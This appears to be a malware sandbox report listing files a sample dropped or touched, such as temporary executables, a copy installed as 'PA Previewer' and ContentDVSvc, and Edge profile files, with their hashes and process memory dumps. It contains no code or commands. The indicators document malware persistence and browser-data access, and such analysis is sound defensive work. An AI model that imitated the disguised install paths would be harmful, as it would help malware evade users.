C:\Users\Admin\AppData\Local\Temp\kos1.exe

MD5 85b698363e74ba3c08fc16297ddc284e
SHA1 171cfea4a82a7365b241f16aebdb2aad29f4f7c0
SHA256 78efcbb0c6eb6a4c76c036adc65154b8ff028849f79d508e45babfb527cb7cfe
SHA512 7e4816c43e0addba088709948e8aedc9e39d6802c74a75cfbc2a0e739b44c5b5eef2bb2453b7032c758b0bdb38e4e7a598aa29be015796361b81d7f9e8027796

memory/1324-165-0x000002099BB80000-0x000002099BBCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 f0ba7739cc07608c54312e79abaf9ece
SHA1 38b075b2e04bc8eee78b89766c1cede5ad889a7e
SHA256 9e96d77f013c6ca17f641c947be11a1bb8921937ed79ec98c4b49ef4c641ae5f
SHA512 15da0554fdd9fb80325883344349b3b4d7b5a612c13eecb810c488621f805ab59c159a54c526ae92f1b81064949bf408f9f2ad07a4c8eda424b2a8f89ea6e165

memory/2220-203-0x0000000000E30000-0x0000000001008000-memory.dmp

memory/4752-204-0x0000000000400000-0x000000000045A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6FD.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/4752-222-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/2220-221-0x0000000000E30000-0x0000000001008000-memory.dmp

memory/4752-223-0x0000000008120000-0x00000000086C4000-memory.dmp

memory/4752-224-0x0000000007C70000-0x0000000007D02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

C:\Users\Admin\AppData\Local\Temp\set16.exe

MD5 22d5269955f256a444bd902847b04a3b
SHA1 41a83de3273270c3bd5b2bd6528bdc95766aa268
SHA256 ab16986253bd187e3134f27495ef0db4b648f769721bc8c84b708c7ba69156fd
SHA512 d85ada5d8c2c02932a79241a484b088ba70bda0497fd8ad638300935a16841d7cbc8258be93055907cb533bc534fdd48c7c91109fa22f87e65a6b374cd51055c

memory/4752-226-0x0000000007E30000-0x0000000007E40000-memory.dmp

memory/4752-236-0x0000000007D30000-0x0000000007D3A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/1324-246-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

memory/988-244-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6FD.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c2c6f00f930237ffdd2547aad0bd4ceb
SHA1 ffdaf2e30c5c74be7f541ccd043b6c5c70a60ab7
SHA256 ffa3b54d1eb86d9ba8159a165e7e8095b5be54bd898bc9c22f8a0b8b05dd5193
SHA512 6473e268a70fcbdbfb4896dccbf44afa3a4e39c93c79567df50ef9f36e949ecc8a1c6aabc519c9ea31c7c5c182f23be7a954cdac32b244150c3c9ae311ee756e

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/988-249-0x0000000000400000-0x0000000000413000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\c3212bf1-31e5-443e-ae22-0af9d1ac4d93.tmp

MD5 dec1a6a07f4b8b59dad816baa4fe60b2
SHA1 94dc57e1be8adfb68bd0840def44e4a70c4f84e9
SHA256 c84e12278d51a1d8a73a4e4c315415e9502201c2d880930c3c474f2dcd5c6a46
SHA512 ee0d86c430b4a59f53932436541b1bd952c0a2a0e53e37c65e4fa64709eb30de3afe7cbfdfa1dd8cf1393064ac512839c12d2c13a64c4ada0eab31fbf47be4d8

memory/2560-260-0x00000000006F0000-0x00000000006F8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

C:\Users\Admin\AppData\Local\Temp\is-VTMP5.tmp\is-ERTP0.tmp

MD5 2fba5642cbcaa6857c3995ccb5d2ee2a
SHA1 91fe8cd860cba7551fbf78bc77cc34e34956e8cc
SHA256 ddec51f3741f3988b9cc792f6f8fc0dfa2098ef0eb84c6a2af7f8da5a72b40fa
SHA512 30613b43427d17115134798506f197c0f5f8b2b9f247668fa25b9dd4853bbd97ac1e27f4e3325dec4f6dfc0e448ebbddb2969ad1a1781aa59ebf522d436aed7c

memory/2336-270-0x000001B2F85C0000-0x000001B2F86C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QNJ04.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

memory/1324-273-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

memory/2560-272-0x000000001B3A0000-0x000000001B3B0000-memory.dmp

memory/2336-269-0x000001B2F7E30000-0x000001B2F7E40000-memory.dmp

memory/2560-268-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

memory/2336-264-0x0000000000400000-0x00000000004B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\kos.exe

MD5 076ab7d1cc5150a5e9f8745cc5f5fb6c
SHA1 7b40783a27a38106e2cc91414f2bc4d8b484c578
SHA256 d1b71081d7ba414b589338329f278ba51c6ccf542d74f131f96c2337ee0a4c90
SHA512 75e274a654e88feb0d66156f387bc5e420811f4f62939396a7455d12e835d7e134b2579ab59976c591b416d1ec1acdf05e9eb290c8f01383c6a50bf43854420b

memory/1324-263-0x000002099BAA0000-0x000002099BAB0000-memory.dmp

memory/4512-262-0x0000000073C20000-0x00000000743D0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-QNJ04.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

C:\Users\Admin\AppData\Local\Temp\is-QNJ04.tmp\_isetup\_isdecmp.dll

MD5 b4786eb1e1a93633ad1b4c112514c893
SHA1 734750b771d0809c88508e4feb788d7701e6dada
SHA256 2ae4169f721beb389a661e6dbb18bc84ef38556af1f46807da9d87aec2a6f06f
SHA512 0882d2aa163ece22796f837111db0d55158098035005e57cd2e9b8d59dc2e582207840bf98bee534b81c368acf60ab5d8ecbe762209273bda067a215cdb2c0c6

memory/3344-271-0x00000000004D0000-0x000000000052A000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 699e3636ed7444d9b47772e4446ccfc1
SHA1 db0459ca6ceeea2e87e0023a6b7ee06aeed6fded
SHA256 9205233792628ecf0d174de470b2986abf3adfed702330dc54c4a76c9477949a
SHA512 d5d4c08b6aec0f3e3506e725decc1bdf0b2e2fb50703c36d568c1ea3c3ab70720f5aec9d49ad824505731eb64db399768037c9f1be655779ed77331a7bab1d51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 39969563bf1f2a8aa018152097c91fce
SHA1 1f55874f79116edd68e7a05b9048bed7cc08eb81
SHA256 7761d0d4f80bc9d58b911595556db8b712273ccc7ce5c661f1620b27fd6abc7e
SHA512 88f625f445daa90ece3c0c8672eaed63b3efc19ae34a42b0282f9fa9bdd3ff84cd6c3684957fdb7d1ba304d96880f9a5759d7d727e765e9ac1c3dfeb03af5919

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AppLaunch.exe.log

MD5 916851e072fbabc4796d8916c5131092
SHA1 d48a602229a690c512d5fdaf4c8d77547a88e7a2
SHA256 7e750c904c43d27c89e55af809a679a96c0bb63fc511006ffbceffc2c7f6fb7d
SHA512 07ce4c881d6c411cac0b62364377e77950797c486804fb10d00555458716e3c47b1efc0d1f37e4cc3b7e6565bb402ca01c7ea8c963f9f9ace941a6e3883d2521

memory/3344-316-0x0000000000400000-0x0000000000469000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\A6FD.exe

MD5 bf58b6afac98febc716a85be5b8e9d9e
SHA1 4a36385b3f8e8a84a995826d77fcd8e76eba7328
SHA256 16b88051fd1e27d08d1408bb51002dd25edb88292807a92ee25ba5f4c0895b8d
SHA512 a3f8deabbb35e4d4928ec6cf836cdef1a57aed879ce10646d3f8cd9cccf93c0c80c89d1e82dc6c9c558f61429eb6416f5ecd8235f8933f90db6bb46f7cf165ec

memory/3340-335-0x00000000033F0000-0x0000000003561000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 70021c4e5314f2dc05d11415ad0b9a51
SHA1 906f2243d2ca8f74cf3f783faee2028d304bcf0b
SHA256 ad827ffbb0ac06ab15d928118d7debc836522d708f3ee553969bab4c9d58cea2
SHA512 fd1b410e4a71a44f60e5baaa599bff4701add8bb285b20798d45714099a97b05729353027002d5422d7d4da5d97d23e29aff581b32fb47ed1d69cd8c6b03f294

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 831fffc049408bd429512ce0ebbba41b
SHA1 75436ed2df88dc1238a1111fb1d31ff7d46eec07
SHA256 9eaab923e1050f809730734f9349b1f1fdee5b5f784ec958612c128c1b0784e1
SHA512 66ccf952926667b654dfe03b894068562fe8cf422aa836e9b1c89ced7ab199c4dd2d18226166689aa581247225f6d5617c0fd9ebd733921c4c16c0b2e2b08ff0

memory/4752-371-0x0000000008850000-0x00000000088B6000-memory.dmp

memory/2336-370-0x000001B2F7D20000-0x000001B2F7D28000-memory.dmp

memory/2336-393-0x000001B2F7D70000-0x000001B2F7DC6000-memory.dmp

C:\ProgramData\ContentDVSvc\ContentDVSvc.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c2144b3a14deec40f39cd3db1cac1aa6
SHA1 276778eac47a278d9c7a7c7ad0b56211832abf7a
SHA256 c5dea0d0997fdd343c4cbef745a8af477ad38d3853fcec29c3133a7083badf8a
SHA512 66ad9633ba05ca84608f6acdc89ab27b92939bae4b5e715dceb9720bd94a6ff41509543dbf64ca68940004b0e3bb3526cbb8e14b6e3a4c22d6d5f520bafe85e7

memory/5824-395-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/5824-392-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 5207fe3fad325f468b65af0655de687c
SHA1 59a6c7052df69a51f5dc911a1ae673a77484c72b
SHA256 fe3d76e8fd09e23940bcb12b0f7a123b0de060fac83d4a2173f803c844acc7b5
SHA512 aec727ced0850ddb223b9ca1076d115ca98494543aa04e1411db91f4a55ba74bff47dde966d0ac25acfe991326721b853804e8966d77d5e10e227fcd32400585

memory/1588-439-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 285252a2f6327d41eab203dc2f402c67
SHA1 acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA256 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA512 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

memory/3344-368-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/5824-369-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1588-441-0x0000000000400000-0x00000000005F1000-memory.dmp

C:\Program Files (x86)\PA Previewer\previewer.exe

MD5 27b85a95804a760da4dbee7ca800c9b4
SHA1 f03136226bf3dd38ba0aa3aad1127ccab380197c
SHA256 f98b98404ecf3871a10a290ade21ad77d0b2633f47247debc53d094b9bdff245
SHA512 e760a15370272aa9541f1afceaaf4f5a8068dad21c6a8d50ebd01514e16bbc8f867c8af349080f3d1fa7a19eafe7cde74921d01716dea69ef801da1b74eae4a7

memory/3340-333-0x0000000003570000-0x00000000036A1000-memory.dmp

memory/1504-331-0x0000000000610000-0x0000000000611000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

MD5 ec6aae2bb7d8781226ea61adca8f0586
SHA1 d82b3bad240f263c1b887c7c0cc4c2ff0e86dfe3
SHA256 b02fffaba9e664ff7840c82b102d6851ec0bb148cec462cef40999545309e599
SHA512 aa62a8cd02a03e4f462f76ae6ff2e43849052ce77cca3a2ccf593f6669425830d0910afac3cf2c46dd385454a6fb3b4bd604ae13b9586087d6f22de644f9dfc7

memory/2336-314-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

memory/4752-449-0x0000000073C20000-0x00000000743D0000-memory.dmp

memory/988-452-0x0000000000400000-0x0000000000413000-memory.dmp

memory/4752-453-0x0000000007E30000-0x0000000007E40000-memory.dmp

memory/4752-455-0x0000000009790000-0x0000000009806000-memory.dmp

memory/4752-456-0x00000000099E0000-0x0000000009BA2000-memory.dmp

memory/4752-457-0x000000000A0E0000-0x000000000A60C000-memory.dmp

memory/4752-458-0x0000000009900000-0x000000000991E000-memory.dmp

memory/2336-459-0x000001B2F7E30000-0x000001B2F7E40000-memory.dmp

memory/1504-460-0x0000000000400000-0x00000000004B0000-memory.dmp

memory/2560-463-0x000000001B3A0000-0x000000001B3B0000-memory.dmp

memory/5824-462-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2560-461-0x00007FFA50070000-0x00007FFA50B31000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

memory/3784-529-0x0000000000400000-0x0000000000D1B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_d3mx2jjb.swx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3180-555-0x0000000002FE0000-0x0000000002FF6000-memory.dmp

memory/5824-556-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3784-590-0x0000000000400000-0x0000000000D1B000-memory.dmp

memory/1180-596-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-597-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-598-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-599-0x000001BAE4530000-0x000001BAE4550000-memory.dmp

memory/1180-602-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-603-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-604-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-605-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-606-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1588-607-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1588-611-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1588-616-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1180-618-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1180-619-0x0000000140000000-0x00000001407CF000-memory.dmp

memory/1588-621-0x0000000000400000-0x00000000005F1000-memory.dmp

memory/1588-624-0x0000000000400000-0x00000000005F1000-memory.dmp